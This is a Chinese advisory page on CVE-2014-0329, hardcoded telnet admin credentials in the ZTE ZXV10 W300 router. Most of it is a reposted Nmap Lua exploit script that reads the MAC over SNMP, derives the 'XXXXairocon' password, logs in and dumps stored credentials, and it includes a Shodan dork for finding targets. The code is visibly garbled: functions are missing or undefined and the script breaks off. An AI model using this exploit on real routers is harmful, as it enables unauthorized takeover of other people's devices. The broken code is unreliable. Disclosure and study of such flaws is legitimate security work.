首页 / 操作系统 / Linux / ZTE ZXV10 W300无线路由器硬编码凭证安全措施绕过漏洞
发布日期:2014-02-03 更新日期:2014-02-11受影响系统: ZTE ZXV10 W300 2.1 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 65310 CVE(CAN) ID: CVE-2014-0329ZTE ZXV10 W300是款无线路由器产品。ZTE ZXV10 W300路由器(固件版本2.1.0)的TELNET服务包含硬编码的管理员用户名及密码(XXXXairocon,其中XXXX是设备的MAC地址的后4位字符),如果远程攻击者了解密码前面的MAC地址字符,即可利用此漏洞获取管理员访问权限。<*来源:Cesar Neira *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Cesar Neira ()提供了如下测试方法:# Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials # Date: 03 Feb 2014 # Exploit Author: Cesar Neira # Vendor Homepage: http://wwwen.zte.com.cn/ # Version: ZTE ZXV10 W300 v2.1 # CVE : CVE-2014-0329 # Dork (Shodan): Basic realm="index.htm" # References: http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html local nmap = require "nmap" local stdnse = require "stdnse" local snmp = require "snmp" local vulns = require "vulns"description = [[ ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet service on the device. The username is "admin" and the password is "XXXXairocon" where "XXXX" is the last four characters of the device"s MAC address. The MAC address is obtainable over SNMP with community string public. ]] author = "Cesar Neira" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"vuln", "exploit", "intrusive"}--- -- -- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org -- @output -- PORT STATE SERVICE -- 23/tcp open telnet -- 161/udp open|filtered snmp -- -- Host script results: -- | airocon: -- | VULNERABLE: -- | ZTE ZXV10 W300 router contains hardcoded credentials -- | State: VULNERABLE (Exploitable) -- | IDs: CVE:CVE-2014-0329 -- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) -- | Description: -- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet -- | service on the device. The username is "admin" and the password is "XXXXairocon" -- | where "XXXX" is the last four characters of the device"s MAC address. The MAC address -- | is obtainable over SNMP with community string public. -- | Disclosure date: 2014-2-3 -- | Exploit results: -- | admin:1234 -- | support:1234 -- | admin:0E91airocon -- | References: -- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329 -- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html -- |_ http://www.kb.cert.org/vuls/id/228886-- @args community SNMP community (Default: public) -- --- local DEFAULT_COMMUNITY = "public" hostrule = function(host) local snmp_port, telnet_port
snmp_port = nmap.get_port_state(host, {number=161, protocol="udp"}) if not snmp_port and not (snmp_port.state == "open" or snmp_port.state == "open|filtered") then return false end
telnet_port = nmap.get_port_state(host, {number=23, protocol="tcp"}) if not telnet_port and not telnet_port.state == "open" then return false end
return true end local get_mac = function(host, community) local socket, status, response
if not status then socket:close() return status, response end
socket:close()
return true, response end local parse_response = function(response) local index
index = string.find(response, "Username +Password +Priority")
if not index then return false, "Unexpected response value." end index = string.find(response, "
", index) + 2 response = string.sub(response, index) local result, endl, line result = {}
index = 0 endl = string.find(response, "
", index) while endl do line = string.sub(response, index, endl) line = string.gsub(line, "
", "") line = string.gsub(line, "^ +", "") line = string.gsub(line, " +$", "") line = string.gsub(line, " +", " ")
local user, pass, prio for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do local aux = {} aux["username"] = user aux["password"] = pass aux["priority"] = prio table.insert(result, aux) end
index = endl + 2 endl = string.find(response, "
", index) end
return true, result end action = function(host) local vuln = { title = "ZTE ZXV10 W300 router contains hardcoded credentials", state = vulns.STATE.NOT_VULN, IDS = {CVE = "CVE-2014-0329"}, risk_factor = "High", scores = { CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)", }, description = [[ ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet service on the device. The username is "admin" and the password is "XXXXairocon" where "XXXX" is the last four characters of the device"s MAC address. The MAC address is obtainable over SNMP with community string public.]], references = { "http://www.kb.cert.org/vuls/id/228886", "http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html" }, dates = { disclosure = {year = 2014, month = 2, day = 3}, }, exploit_results = {}, } local community community = stdnse.get_script_args(SCRIPT_NAME .. ".community") or DEFAULT_COMMUNITY
local status, response
status, response = get_mac(host, community) if not status then return response end
local password password = string.upper(string.sub(response, 9)) .. "airocon"
status, response = dump_creds(host, "admin", password) if not status then return response end
status, response = parse_response( response ) if not status then return response end
vuln.state = vulns.STATE.EXPLOIT for _, data in pairs(response) do table.insert(vuln.exploit_results, data.username .. ":" .. data.password) end
易网时代-编程资源站